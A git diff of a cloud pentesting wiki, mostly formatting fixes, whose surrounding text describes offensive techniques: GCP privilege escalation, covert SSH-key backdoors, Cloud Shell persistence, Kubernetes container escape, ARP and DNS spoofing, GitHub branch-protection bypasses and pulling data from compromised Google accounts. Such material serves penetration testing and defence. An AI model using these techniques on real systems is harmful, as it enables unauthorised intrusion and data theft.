@@ -303,16 +303,16 @@ The unusual feature of CloudHSM is that it is a physical device, and thus it is Typically, a device is available within 15 minutes assuming there is capacity, but if the AZ is out of capacity it can take two weeks or more to acquire additional capacity. -Both KMS and CloudHSM are available to you at AWS and both are integrated with your apps at AWS. Since this is a physical device dedicated to you, **the keys are stored on the device**. Keys need to either be **replicated to another device**, backed up to offline storage, or exported to a standby appliance. **This device is not backed** by S3 or any other service at AWS like KMS. +Both KMS and CloudHSM are available to you at AWS and both are integrated with your apps at AWS. Since this is a physical device dedicated to you, **the keys are stored on the device**. Keys need to either be **replicated to another device**, backed up to offline storage, or exported to a standby appliance. **This device is not backed** by S3 or any other service at AWS like KMS. In **CloudHSM**, you have to **scale the service yourself**. You have to provision enough CloudHSM devices to handle whatever your encryption needs are based on the encryption algorithms you have chosen to implement for your solution.\ -Key Management Service scaling is performed by AWS and automatically scales on demand, so as your use grows, so might the number of CloudHSM appliances that are required. Keep this in mind as you scale your solution and if your solution has auto-scaling, make sure your maximum scale is accounted for with enough CloudHSM appliances to service the solution. +Key Management Service scaling is performed by AWS and automatically scales on demand, so as your use grows, so might the number of CloudHSM appliances that are required. Keep this in mind as you scale your solution and if your solution has auto-scaling, make sure your maximum scale is accounted for with enough CloudHSM appliances to service the solution. 
Just like scaling, **performance is up to you with CloudHSM**. Performance varies based on which encryption algorithm is used and on how often you need to access or retrieve the keys to encrypt the data. Key management service performance is handled by Amazon and automatically scales as demand requires it. CloudHSM's performance is achieved by adding more appliances and if you need more performance you either add devices or alter the encryption method to the algorithm that is faster. If your solution is **multi-region**, you should add several **CloudHSM appliances in the second region and work out the cross-region connectivity with a private VPN connection** or some method to ensure the traffic is always protected between the appliance at every layer of the connection. If you have a multi-region solution you need to think about how to **replicate keys and set up additional CloudHSM devices in the regions where you operate**. You can very quickly get into a scenario where you have six or eight devices spread across multiple regions, enabling full redundancy of your encryption keys. -**CloudHSM** is an enterprise class service for secured key storage and can be used as a **root of trust for an enterprise**. It can store private keys in PKI and certificate authority keys in X509 implementations. In addition to symmetric keys used in symmetric algorithms such as AES, **KMS stores and physically protects symmetric keys only (cannot act as a certificate authority)**, so if you need to store PKI and CA keys a CloudHSM or two or three could be your solution. +**CloudHSM** is an enterprise class service for secured key storage and can be used as a **root of trust for an enterprise**. It can store private keys in PKI and certificate authority keys in X509 implementations. 
In addition to symmetric keys used in symmetric algorithms such as AES, **KMS stores and physically protects symmetric keys only (cannot act as a certificate authority)**, so if you need to store PKI and CA keys a CloudHSM or two or three could be your solution. **CloudHSM is considerably more expensive than Key Management Service**. CloudHSM is a hardware appliance so you have fix costs to provision the CloudHSM device, then an hourly cost to run the appliance. The cost is multiplied by as many CloudHSM appliances that are required to achieve your specific requirements.\ Additionally, cross consideration must be made in the purchase of third party software such as SafeNet ProtectV software suites and integration time and effort. Key Management Service is a usage based and depends on the number of keys you have and the input and output operations. As key management provides seamless integration with many AWS services, integration costs should be significantly lower. Costs should be considered secondary factor in encryption solutions. Encryption is typically used for security and compliance. @@ -512,7 +512,7 @@ You can make any of those run on the EC2 machines you decide. * Rules packages to be used * Duration of the assessment run 15min/1hour/8hours * SNS topics, select when notify: Starts, finished, change state, reports a finding -* Attributes to b assigned to findings +* Attributes to b assigned to findings **Rule package**: Contains a number of individual rules that are check against an EC2 when an assessment is run. Each one also have a severity (high, medium, low, informational). The possibilities are: 
@@ -532,7 +532,7 @@ Note that nowadays AWS already allow you to **autocreate** all the necesary **co **Telemetry**: data that is collected from an instance, detailing its configuration, behavior and processes during an assessment run. Once collected, the data is then sent back to Amazon Inspector in near-real-time over TLS where it is then stored and encrypted on S3 via an ephemeral KMS key. Amazon Inspector then accesses the S3 Bucket, decrypts the data in memory, and analyzes it against any rules packages used for that assessment to generate the findings. -**Assessment Report**: Provide details on what was assessed and the results of the assessment. +**Assessment Report**: Provide details on what was assessed and the results of the assessment. * The **findings report** contain the summary of the assessment, info about the EC2 and rules and the findings that occurred. * The **full report** is the finding report + a list of rules that were passed. 
@@ -589,7 +589,7 @@ The main function of the service is to provide an automatic method of **detectin The service is backed by **machine learning**, allowing your data to be actively reviewed as different actions are taken within your AWS account. Machine learning can spot access patterns and **user behavior** by analyzing **cloud trail event** data to **alert against any unusual or irregular activity**. Any findings made by Amazon Macie are presented within a dashboard which can trigger alerts, allowing you to quickly resolve any potential threat of exposure or compromise of your data. Amazon Macie will automatically and continuously **monitor and detect new data that is stored in Amazon S3**. Using the abilities of machine learning and artificial intelligence, this service has the ability to familiarize over time, access patterns to data. \ -Amazon Macie also uses natural language processing methods to **classify and interpret different data types and content**. NLP uses principles from computer science and computational linguistics to look at the interactions between computers and the human language. In particular, how to program computers to understand and decipher language data. The **service can automatically assign business values to data that is assessed in the form of a risk score**. This enables Amazon Macie to order findings on a priority basis, enabling you to focus on the most critical alerts first. In addition to this, Amazon Macie also has the added benefit of being able to **monitor and discover security changes governing your data**. As well as identify specific security-centric data such as access keys held within an S3 bucket. +Amazon Macie also uses natural language processing methods to **classify and interpret different data types and content**. NLP uses principles from computer science and computational linguistics to look at the interactions between computers and the human language. 
In particular, how to program computers to understand and decipher language data. The **service can automatically assign business values to data that is assessed in the form of a risk score**. This enables Amazon Macie to order findings on a priority basis, enabling you to focus on the most critical alerts first. In addition to this, Amazon Macie also has the added benefit of being able to **monitor and discover security changes governing your data**. As well as identify specific security-centric data such as access keys held within an S3 bucket. This protective and proactive security monitoring enables Amazon Macie to identify critical, sensitive, and security focused data such as API keys, secret keys, in addition to PII (personally identifiable information) and PHI data. @@ -615,7 +615,7 @@ Pre-defined alerts categories: * Service disruption * Suspicious access -The **alert summary** provides detailed information to allow you to respond appropriately. It has a description that provides a deeper level of understanding of why it was generated. It also has a breakdown of the results. +The **alert summary** provides detailed information to allow you to respond appropriately. It has a description that provides a deeper level of understanding of why it was generated. It also has a breakdown of the results. The user has the possibility to create new custom alerts. 
@@ -752,10 +752,10 @@ One key point of EMR is that **by default, the instances within a cluster do not From an encryption in transit perspective, you could enable **open source transport layer security** encryption features and select a certificate provider type which can be either PEM where you will need to manually create PEM certificates, bundle them up with a zip file and then reference the zip file in S3 or custom where you would add a custom certificate provider as a Java class that provides encryption artefacts. -Once the TLS certificate provider has been configured in the security configuration file, the following encryption applications specific encryption features can be enabled which will vary depending on your EMR version. +Once the TLS certificate provider has been configured in the security configuration file, the following encryption applications specific encryption features can be enabled which will vary depending on your EMR version. * Hadoop might reduce encrypted shuffle which uses TLS. Both secure Hadoop RPC which uses Simple Authentication Security Layer, and data encryption of HDFS Block Transfer which uses AES-256, are both activated when at rest encryption is enabled in the security configuration. -* Presto: When using EMR version 5.6.0 and later, any internal communication between Presto nodes will use SSL and TLS. +* Presto: When using EMR version 5.6.0 and later, any internal communication between Presto nodes will use SSL and TLS. * Tez Shuffle Handler uses TLS. * Spark: The Akka protocol uses TLS. Block Transfer Service uses Simple Authentication Security Layer and 3DES. External shuffle service uses the Simple Authentication Security Layer. 
@@ -779,7 +779,7 @@ Once the database is associated with an option group, you must ensure that the O Amazon Firehose is used to deliver **real-time streaming data to different services** and destinations within AWS, many of which can be used for big data such as S3 Redshift and Amazon Elasticsearch. -The service is fully managed by AWS, taking a lot of the administration of maintenance out of your hands. Firehose is used to receive data from your data producers where it then automatically delivers the data to your chosen destination. +The service is fully managed by AWS, taking a lot of the administration of maintenance out of your hands. Firehose is used to receive data from your data producers where it then automatically delivers the data to your chosen destination. Amazon Streams essentially collects and processes huge amounts of data in real time and makes it available for consumption. @@ -844,7 +844,7 @@ You can have **100 conditions of each type**, such as Geo Match or size constrai ### Rules Using these conditions you can create rules: For example, block request if 2 conditions are met.\ -When creating your rule you will be asked to select a **Rule Type**: **Regular Rule** or **Rate-Based Rule**. +When creating your rule you will be asked to select a **Rule Type**: **Regular Rule** or **Rate-Based Rule**. The only **difference** between a rate-based rule and a regular rule is that **rate-based** rules **count** the **number** of **requests** that are being received from a particular IP address over a time period of **five minutes**. 
@@ -858,7 +858,7 @@ An action is applied to each rule, these actions can either be **Allow**, **Bloc * When a request is **blocked**, the request is **terminated** there and no further processing of that request is taken. * A **Count** action will **count the number of requests that meet the conditions** within that rule. This is a really good option to select when testing the rules to ensure that the rule is picking up the requests as expected before setting it to either Allow or Block. -If an **incoming request does not meet any rule** within the Web ACL then the request takes the action associated to a **default action** specified which can either be **Allow** or **Block**. An important point to make about these rules is that they are **executed in the order that they are listed within a Web ACL**. So be careful to architect this order correctly for your rule base, **typically** these are **ordered** as shown: +If an **incoming request does not meet any rule** within the Web ACL then the request takes the action associated to a **default action** specified which can either be **Allow** or **Block**. An important point to make about these rules is that they are **executed in the order that they are listed within a Web ACL**. So be careful to architect this order correctly for your rule base, **typically** these are **ordered** as shown: 1. WhiteListed Ips as Allow. 2. BlackListed IPs Block 
@@ -884,7 +884,7 @@ A **rule group** (a set of WAF rules together) can be added to an AWS Firewall M AWS Shield has been designed to help **protect your infrastructure against distributed denial of service attacks**, commonly known as DDoS. -**AWS Shield Standard** is **free** to everyone, and it offers DDoS **protection** against some of the more common layer three, the **network layer**, and layer four, **transport layer**, DDoS attacks. This protection is integrated with both CloudFront and Route 53. +**AWS Shield Standard** is **free** to everyone, and it offers DDoS **protection** against some of the more common layer three, the **network layer**, and layer four, **transport layer**, DDoS attacks. This protection is integrated with both CloudFront and Route 53. **AWS Shield advanced** offers a **greater level of protection** for DDoS attacks across a wider scope of AWS services for an additional cost. This advanced level offers protection against your web applications running on EC2, CloudFront, ELB and also Route 53. In addition to these additional resource types being protected, there are enhanced levels of DDoS protection offered compared to that of Standard. And you will also have **access to a 24-by-seven specialized DDoS response team at AWS, known as DRT**. 
@@ -922,10 +922,10 @@ In addition, take the following into consideration when you use Site-to-Site VPN #### Concepts -* **Client VPN endpoint:** The resource that you create and configure to enable and manage client VPN sessions. It is the resource where all client VPN sessions are terminated. -* **Target network:** A target network is the network that you associate with a Client VPN endpoint. **A subnet from a VPC is a target network**. Associating a subnet with a Client VPN endpoint enables you to establish VPN sessions. You can associate multiple subnets with a Client VPN endpoint for high availability. All subnets must be from the same VPC. Each subnet must belong to a different Availability Zone. +* **Client VPN endpoint:** The resource that you create and configure to enable and manage client VPN sessions. It is the resource where all client VPN sessions are terminated. +* **Target network:** A target network is the network that you associate with a Client VPN endpoint. **A subnet from a VPC is a target network**. Associating a subnet with a Client VPN endpoint enables you to establish VPN sessions. You can associate multiple subnets with a Client VPN endpoint for high availability. All subnets must be from the same VPC. Each subnet must belong to a different Availability Zone. * **Route**: Each Client VPN endpoint has a route table that describes the available destination network routes. Each route in the route table specifies the path for traffic to specific resources or networks. -* **Authorization rules:** An authorization rule **restricts the users who can access a network**. For a specified network, you configure the Active Directory or identity provider (IdP) group that is allowed access. Only users belonging to this group can access the specified network. **By default, there are no authorization rules** and you must configure authorization rules to enable users to access resources and networks. 
+* **Authorization rules:** An authorization rule **restricts the users who can access a network**. For a specified network, you configure the Active Directory or identity provider (IdP) group that is allowed access. Only users belonging to this group can access the specified network. **By default, there are no authorization rules** and you must configure authorization rules to enable users to access resources and networks. * **Client:** The end user connecting to the Client VPN endpoint to establish a VPN session. End users need to download an OpenVPN client and use the Client VPN configuration file that you created to establish a VPN session. * **Client CIDR range:** An IP address range from which to assign client IP addresses. Each connection to the Client VPN endpoint is assigned a unique IP address from the client CIDR range. You choose the client CIDR range, for example, `10.2.0.0/16`. * **Client VPN ports:** AWS Client VPN supports ports 443 and 1194 for both TCP and UDP. The default is port 443. @@ -957,7 +957,7 @@ Amazon Cognito provides **authentication, authorization, and user management** f The two main components of Amazon Cognito are user pools and identity pools. **User pools** are user directories that provide **sign-up and sign-in options for your app users**. **Identity pools** enable you to grant your users **access to other AWS services**. You can use identity pools and user pools separately or together. -### **User pools** +### **User pools** A user pool is a user directory in Amazon Cognito. With a user pool, your users can **sign in to your web or mobile app** through Amazon Cognito, **or federate** through a **third-party** identity provider (IdP). Whether your users sign in directly or through a third party, all members of the user pool have a directory profile that you can access through an SDK. diff --git a/cloud-security/circleci.md b/cloud-security/circleci.md index 1076c680..4d7efb3b 100644 --- a/cloud-security/circleci.md 
+++ b/cloud-security/circleci.md @@ -2,7 +2,7 @@ ## Basic Information -****[**CircleCI**](https://circleci.com/docs/2.0/about-circleci/) is a Continuos Integration platform where you ca **define templates** indicating what you want it to do with some code and when to do it. This way you can **automate testing** or **deployments** directly **from your repo master branch** for example. +[**CircleCI**](https://circleci.com/docs/2.0/about-circleci/) is a Continuos Integration platform where you ca **define templates** indicating what you want it to do with some code and when to do it. This way you can **automate testing** or **deployments** directly **from your repo master branch** for example. ## Permissions @@ -17,7 +17,7 @@ According to [**the docs**](https://circleci.com/docs/2.0/env-vars/#) there are ### Built-in env variables -Every container run by CircleCI will always have [**specific env vars defined in the documentation**](https://circleci.com/docs/2.0/env-vars/#built-in-environment-variables) **** like **** `CIRCLE_PR_USERNAME`, `CIRCLE_PROJECT_REPONAME` or `CIRCLE_USERNAME`. +Every container run by CircleCI will always have [**specific env vars defined in the documentation**](https://circleci.com/docs/2.0/env-vars/#built-in-environment-variables) like `CIRCLE_PR_USERNAME`, `CIRCLE_PROJECT_REPONAME` or `CIRCLE_USERNAME`. ### Clear text diff --git a/cloud-security/concourse/concourse-lab-creation.md b/cloud-security/concourse/concourse-lab-creation.md index 7c57e192..035e6960 100644 --- a/cloud-security/concourse/concourse-lab-creation.md +++ b/cloud-security/concourse/concourse-lab-creation.md 
@@ -79,7 +79,7 @@ A pipeline is made of a list of [Jobs](https://concourse-ci.org/jobs.html) which Several different type of steps can be used: -* **the** [**`task` step**](https://concourse-ci.org/task-step.html) **runs a** [**task**](https://concourse-ci.org/tasks.html)**** +* **the** [**`task` step**](https://concourse-ci.org/task-step.html) **runs a** [**task**](https://concourse-ci.org/tasks.html) * the [`get` step](https://concourse-ci.org/get-step.html) fetches a [resource](https://concourse-ci.org/resources.html) * the [`put` step](https://concourse-ci.org/put-step.html) updates a [resource](https://concourse-ci.org/resources.html) * the [`set_pipeline` step](https://concourse-ci.org/set-pipeline-step.html) configures a [pipeline](https://concourse-ci.org/pipelines.html) diff --git a/cloud-security/gcp-security/gcp-interesting-permissions/gcp-privesc-to-other-principals.md b/cloud-security/gcp-security/gcp-interesting-permissions/gcp-privesc-to-other-principals.md index 302d10f3..9db8a9e2 100644 --- a/cloud-security/gcp-security/gcp-interesting-permissions/gcp-privesc-to-other-principals.md +++ b/cloud-security/gcp-security/gcp-interesting-permissions/gcp-privesc-to-other-principals.md 
@@ -37,7 +37,7 @@ Note that **iam.serviceAccountKeys.update won't work to modify the key** of a SA ### iam.serviceAccounts.implicitDelegation -If you have the _**iam.serviceAccounts.implicitDelegation**_\*\* permission on a Service Account\*\* that has the _**iam.serviceAccounts.getAccessToken**_\*\* permission on a third Service Account\*\*, then you can use implicitDelegation to **create a token for that third Service Account**. Here is a diagram to help explain. +If you have the _**iam.serviceAccounts.implicitDelegation**_** permission on a Service Account** that has the _**iam.serviceAccounts.getAccessToken**_** permission on a third Service Account**, then you can use implicitDelegation to **create a token for that third Service Account**. Here is a diagram to help explain. ![](https://rhinosecuritylabs.com/wp-content/uploads/2020/04/image2-500x493.png) 
@@ -217,7 +217,7 @@ Apparently this permission might be useful to gather auth credentials (basic aut **Kubernetes** by default **prevents** principals from being able to **create** or **update** **RoleBindings** and **ClusterRoleBindings** to give **more permissions** that the ones the principal has. However, a **GCP** principal with that permissions will be **able to create/update RolesBindings/ClusterRolesBindings with more permissions** that ones he has, effectively bypassing the Kubernetes protection against this behaviour. -**container.roleBindings.create** and/or **container.roleBindings.update** OR **container.clusterRoleBindings.create** and/or **container.clusterRoleBindings.update** respectively **** are also **necessary** to perform those privilege escalation actions. +**container.roleBindings.create** and/or **container.roleBindings.update** OR **container.clusterRoleBindings.create** and/or **container.clusterRoleBindings.update** respectively are also **necessary** to perform those privilege escalation actions. ### container.cronJobs.create, container.cronJobs.update container.daemonSets.create, container.daemonSets.update container.deployments.create, container.deployments.update container.jobs.create, container.jobs.update container.pods.create, container.pods.update container.replicaSets.create, container.replicaSets.update container.replicationControllers.create, container.replicationControllers.update container.scheduledJobs.create, container.scheduledJobs.update container.statefulSets.create, container.statefulSets.update 
@@ -255,7 +255,7 @@ For more information [**follow this link**](../../pentesting-kubernetes/abusing- ### storage.hmacKeys.create -There is a feature of Cloud Storage, “interoperability”, that provides a way for Cloud Storage to interact with storage offerings from other cloud providers, like AWS S3. As part of that, there are HMAC keys that can be created for both Service Accounts and regular users. We can **escalate Cloud Storage permissions by creating an HMAC key for a higher-privileged Service Account**. +There is a feature of Cloud Storage, “interoperability”, that provides a way for Cloud Storage to interact with storage offerings from other cloud providers, like AWS S3. As part of that, there are HMAC keys that can be created for both Service Accounts and regular users. We can **escalate Cloud Storage permissions by creating an HMAC key for a higher-privileged Service Account**. HMAC keys belonging to your user cannot be accessed through the API and must be accessed through the web console, but what’s nice is that both the access key and secret key are available at any point. This means we could take an existing pair and store them for backup access to the account. HMAC keys belonging to Service Accounts **can** be accessed through the API, but after creation, you are not able to see the access key and secret again. diff --git a/cloud-security/gcp-security/gcp-local-privilege-escalation-ssh-pivoting.md b/cloud-security/gcp-security/gcp-local-privilege-escalation-ssh-pivoting.md index 15c6f6f2..5028c166 100644 --- a/cloud-security/gcp-security/gcp-local-privilege-escalation-ssh-pivoting.md +++ b/cloud-security/gcp-security/gcp-local-privilege-escalation-ssh-pivoting.md 
@@ -58,7 +58,7 @@ So, if you can **modify custom instance metadata** with your service account, yo ### **Add SSH key to existing privileged user** -Let's start by adding our own key to an existing account, as that will probably make the least noise. +Let's start by adding our own key to an existing account, as that will probably make the least noise. **Check the instance for existing SSH keys**. Pick one of these users as they are likely to have sudo rights. @@ -161,7 +161,7 @@ If you're really bold, you can also just type `gcloud compute ssh [INSTANCE]` to ## **Using OS Login** -****[**OS Login**](https://cloud.google.com/compute/docs/oslogin/) **** is an alternative to managing SSH keys. It links a **Google user or service account to a Linux identity**, relying on IAM permissions to grant or deny access to Compute Instances. +[**OS Login**](https://cloud.google.com/compute/docs/oslogin/) is an alternative to managing SSH keys. It links a **Google user or service account to a Linux identity**, relying on IAM permissions to grant or deny access to Compute Instances. OS Login is [enabled](https://cloud.google.com/compute/docs/instances/managing-instance-access#enable\_oslogin) at the project or instance level using the metadata key of `enable-oslogin = TRUE`. diff --git a/cloud-security/gcp-security/gcp-looting.md b/cloud-security/gcp-security/gcp-looting.md index ab111742..aa0582fb 100644 --- a/cloud-security/gcp-security/gcp-looting.md +++ b/cloud-security/gcp-security/gcp-looting.md 
@@ -115,7 +115,7 @@ kubectl cluster-info You can read more about `gcloud` for containers [here](https://cloud.google.com/sdk/gcloud/reference/container/). -This is a simple script to enumerate kubernetes in GCP: [https://gitlab.com/gitlab-com/gl-security/security-operations/gl-redteam/gcp\_k8s\_enum](https://gitlab.com/gitlab-com/gl-security/security-operations/gl-redteam/gcp\_k8s\_enum) +This is a simple script to enumerate kubernetes in GCP: [https://gitlab.com/gitlab-com/gl-security/security-operations/gl-redteam/gcp\_k8s\_enum](https://gitlab.com/gitlab-com/gl-security/security-operations/gl-redteam/gcp\_k8s\_enum) ## References diff --git a/cloud-security/gcp-security/gcp-persistance.md b/cloud-security/gcp-security/gcp-persistance.md index 5a202bca..5b91c63d 100644 --- a/cloud-security/gcp-security/gcp-persistance.md +++ b/cloud-security/gcp-security/gcp-persistance.md @@ -6,9 +6,9 @@ These are useful techniques once, somehow, you have compromised some GCP credent ### Persistent Backdoor -[**Google Cloud Shell**](https://cloud.google.com/shell/) **** provides you with command-line access to your cloud resources directly from your browser without any associated cost. +[**Google Cloud Shell**](https://cloud.google.com/shell/) provides you with command-line access to your cloud resources directly from your browser without any associated cost. -You can access Google's Cloud Shell from the **web console** or running **`gcloud cloud-shell ssh`**. +You can access Google's Cloud Shell from the **web console** or running **`gcloud cloud-shell ssh`**. This console has some interesting capabilities for attackers: diff --git a/cloud-security/github-security/README.md b/cloud-security/github-security/README.md index 1ed57849..d4381a8d 100644 --- a/cloud-security/github-security/README.md +++ b/cloud-security/github-security/README.md 
@@ -12,7 +12,7 @@ ## External Recon -Github repositories can be configured as public, private and internal. +Github repositories can be configured as public, private and internal. * **Private** means that **only** people of the **organisation** will be able to access them * **Internal** means that **only** people of the **enterprise** (an enterprise may have several organisations) will be able to access it @@ -80,7 +80,7 @@ If the user has configured its username as his github username you can access th As explained [**here**](basic-github-information.md#ssh-keys) sometimes it's needed to sign the commits or you might get discovered. -Check locally if the current user has any key with: +Check locally if the current user has any key with: ```shell gpg --list-secret-keys --keyid-format=long 
@@ -248,7 +248,7 @@ jobs: * **Include administrators**: If this isn’t set and you are admin of the repo, you can bypass this branch protections. * **PR Hijacking**: You could be able to **modify the PR of someone else** adding malicious code, approving the resulting PR yourself and merging everything. * **Removing Branch Protections**: If you are an **admin of the repo you can disable the protections**, merge your PR and set the protections back. -* **Bypassing push protections**: If a repo **only allows certain users** to send push (merge code) in branches (the branch protection might be protecting all the branches specifying the wildcard `*`). +* **Bypassing push protections**: If a repo **only allows certain users** to send push (merge code) in branches (the branch protection might be protecting all the branches specifying the wildcard `*`). * If you have **write access over the repo but you are not allowed to push code** because of the branch protection, you can still **create a new branch** and within it create a **github action that is triggered when code is pushed**. As the **branch protection won't protect the branch until it's created**, this first code push to the branch will **execute the github action**. ### Bypass Environments Protections diff --git a/cloud-security/github-security/basic-github-information.md b/cloud-security/github-security/basic-github-information.md index b1050eb4..13e45c0d 100644 --- a/cloud-security/github-security/basic-github-information.md +++ b/cloud-security/github-security/basic-github-information.md 
@@ -25,7 +25,7 @@ In an organisation users can have different roles: * **Organization members**: The **default**, non-administrative role for **people in an organization** is the organization member. By default, organization members **have a number of permissions**. * **Billing managers**: Billing managers are users who can **manage the billing settings for your organization**, such as payment information. * **Security Managers**: It's a role that organization owners can assign to any team in an organization. When applied, it gives every member of the team permissions to **manage security alerts and settings across your organization, as well as read permissions for all repositories** in the organization. - * If your organization has a security team, you can use the security manager role to give members of the team the least access they need to the organization. + * If your organization has a security team, you can use the security manager role to give members of the team the least access they need to the organization. * **Github App managers**: To allow additional users to **manage GitHub Apps owned by an organization**, an owner can grant them GitHub App manager permissions. * **Outside collaborators**: An outside collaborator is a person who has **access to one or more organization repositories but is not explicitly a member** of the organization. diff --git a/cloud-security/pentesting-kubernetes/abusing-roles-clusterroles-in-kubernetes/README.md b/cloud-security/pentesting-kubernetes/abusing-roles-clusterroles-in-kubernetes/README.md index 4e7ed9d7..fa11e4d0 100644 --- a/cloud-security/pentesting-kubernetes/abusing-roles-clusterroles-in-kubernetes/README.md +++ b/cloud-security/pentesting-kubernetes/abusing-roles-clusterroles-in-kubernetes/README.md 
@@ -236,7 +236,7 @@ kubectl port-forward pod/mypod 5000:5000 ### **Hosts Writable /var/log/ Escape** - **** As [**indicated in this research**](https://jackleadford.github.io/containers/2020/03/06/pvpost.html)**,**If you can access or create a pod with the **hosts `/var/log/` directory mounted** on it, you can **escape from the container**.\ + As [**indicated in this research**](https://jackleadford.github.io/containers/2020/03/06/pvpost.html)**,**If you can access or create a pod with the **hosts `/var/log/` directory mounted** on it, you can **escape from the container**.\ This is basically because the when the **Kube-API tries to get the logs** of a container (using `kubectl logs `), it **requests the `0.log`** file of the pod using the `/logs/` endpoint of the **Kubelet** service.\ The Kubelet service exposes the `/logs/` endpoint which is just basically **exposing the `/var/log` filesystem of the container**. diff --git a/cloud-security/pentesting-kubernetes/kubernetes-access-to-other-clouds.md b/cloud-security/pentesting-kubernetes/kubernetes-access-to-other-clouds.md index 51c3b468..1e7d2a28 100644 --- a/cloud-security/pentesting-kubernetes/kubernetes-access-to-other-clouds.md +++ b/cloud-security/pentesting-kubernetes/kubernetes-access-to-other-clouds.md @@ -11,7 +11,7 @@ A common way to give **access to a kubernetes application to GCP** is to: * Create a GCP Service Account * Bind on it the desired permissions * Download a json key of the created SA -* Mount it as a secret inside the pod +* Mount it as a secret inside the pod * Set the GOOGLE\_APPLICATION\_CREDENTIALS environment variable pointing to the path where the json is. {% hint style="warning" %} @@ -161,7 +161,7 @@ As an attacker, if you can enumerate a K8s cluster, check for **service accounts Moreover, if you are inside a pod, check for env variables like **AWS\_ROLE\_ARN** and **AWS\_WEB\_IDENTITY\_TOKEN.** -**** + {% endhint %} ### Find Pods a SAs with IAM Roles in the Cluster 
diff --git a/cloud-security/pentesting-kubernetes/kubernetes-enumeration.md b/cloud-security/pentesting-kubernetes/kubernetes-enumeration.md index 49cfd5b2..9ef2bd72 100644 --- a/cloud-security/pentesting-kubernetes/kubernetes-enumeration.md +++ b/cloud-security/pentesting-kubernetes/kubernetes-enumeration.md @@ -23,7 +23,7 @@ Usually **one** of the directories: * `/run/secrets/kubernetes.io/serviceaccount` * `/var/run/secrets/kubernetes.io/serviceaccount` -* `/secrets/kubernetes.io/serviceaccount` +* `/secrets/kubernetes.io/serviceaccount` contain the files: @@ -61,7 +61,7 @@ In order to enumerate a K8s environment you need a couple of this: With those details you can **enumerate kubernetes**. If the **API** for some reason is **accessible** through the **Internet**, you can just download that info and enumerate the platform from your host. -However, usually the **API server is inside an internal network**, therefore you will need to **create a tunnel** through the compromised machine to access it from your machine, or you can **upload the** [**kubectl**](https://kubernetes.io/docs/tasks/tools/install-kubectl-linux/#install-kubectl-binary-with-curl-on-linux) binary, or use **`curl/wget/anything`** to perform raw HTTP requests to the API server. +However, usually the **API server is inside an internal network**, therefore you will need to **create a tunnel** through the compromised machine to access it from your machine, or you can **upload the** [**kubectl**](https://kubernetes.io/docs/tasks/tools/install-kubectl-linux/#install-kubectl-binary-with-curl-on-linux) binary, or use **`curl/wget/anything`** to perform raw HTTP requests to the API server. ### Differences between `list` and `get` verbs diff --git a/cloud-security/pentesting-kubernetes/kubernetes-network-attacks.md b/cloud-security/pentesting-kubernetes/kubernetes-network-attacks.md index f7fa110f..75902a8c 100644 --- a/cloud-security/pentesting-kubernetes/kubernetes-network-attacks.md 
+++ b/cloud-security/pentesting-kubernetes/kubernetes-network-attacks.md @@ -247,7 +247,7 @@ arpspoof -t 172.17.0.9 172.17.0.10 As it was already mentioned, if you **compromise a pod in the same node of the DNS server pod**, you can **MitM** with **ARPSpoofing** the **bridge and the DNS** pod and **modify all the DNS responses**. -You have a really nice **tool** and **tutorial** to test this in [**https://github.com/danielsagi/kube-dnsspoof/**](https://github.com/danielsagi/kube-dnsspoof/)**** +You have a really nice **tool** and **tutorial** to test this in [**https://github.com/danielsagi/kube-dnsspoof/**](https://github.com/danielsagi/kube-dnsspoof/) In our scenario, **download** the **tool** in the attacker pod and create a **file named `hosts` ** with the **domains** you want to **spoof** like: @@ -282,5 +282,5 @@ You need to generate a **new DNS packet** with the **src IP** of the **DNS** whe ## References -* ****[https://www.cyberark.com/resources/threat-research-blog/attacking-kubernetes-clusters-through-your-network-plumbing-part-1](https://www.cyberark.com/resources/threat-research-blog/attacking-kubernetes-clusters-through-your-network-plumbing-part-1) +* [https://www.cyberark.com/resources/threat-research-blog/attacking-kubernetes-clusters-through-your-network-plumbing-part-1](https://www.cyberark.com/resources/threat-research-blog/attacking-kubernetes-clusters-through-your-network-plumbing-part-1) * [https://blog.aquasec.com/dns-spoofing-kubernetes-clusters](https://blog.aquasec.com/dns-spoofing-kubernetes-clusters) diff --git a/cloud-security/workspace-security.md b/cloud-security/workspace-security.md index 91a498f4..f740b415 100644 --- a/cloud-security/workspace-security.md +++ b/cloud-security/workspace-security.md 
@@ -104,7 +104,7 @@ This also means that the **App Script will be trusted by the Workspace environme {% hint style="danger" %} This also means that if an **App Script already existed** and people has **granted access**, anyone with **Editor** permission to the doc can **modify it and abuse that access.**\ -****To abuse this you also need people to trigger the App Script. And one neat trick if to **publish the script as a web app**. When the **people** that already granted **access** to the App Script access the web page, they will **trigger the App Script** (this also works using `` tags. +To abuse this you also need people to trigger the App Script. And one neat trick if to **publish the script as a web app**. When the **people** that already granted **access** to the App Script access the web page, they will **trigger the App Script** (this also works using `` tags. {% endhint %} ## Post-Exploitation 
@@ -123,15 +123,15 @@ You potentially need access to the console to join groups that allow to be joine ### Access Groups Mail info -If you managed to **compromise a google user session**, from [**https://groups.google.com/all-groups**](https://groups.google.com/all-groups) **** you can see the history of mails sent to the mail groups the user is member of, and you might find **credentials** or other **sensitive data**. +If you managed to **compromise a google user session**, from [**https://groups.google.com/all-groups**](https://groups.google.com/all-groups) you can see the history of mails sent to the mail groups the user is member of, and you might find **credentials** or other **sensitive data**. ### Takeout - Download Everything Google Knows about an account -If you have a **session inside victims google account** you can download everything Google saves about that account from [**https://takeout.google.com**](https://takeout.google.com/u/1/?pageId=none)**** +If you have a **session inside victims google account** you can download everything Google saves about that account from [**https://takeout.google.com**](https://takeout.google.com/u/1/?pageId=none) ### Vault - Download all the Workspace data of users -If an organization has **Google Vault enabled**, you might be able to access [**https://vault.google.com**](https://vault.google.com/u/1/) **** and **download** all the **information**. +If an organization has **Google Vault enabled**, you might be able to access [**https://vault.google.com**](https://vault.google.com/u/1/) and **download** all the **information**. ### Contacts download 
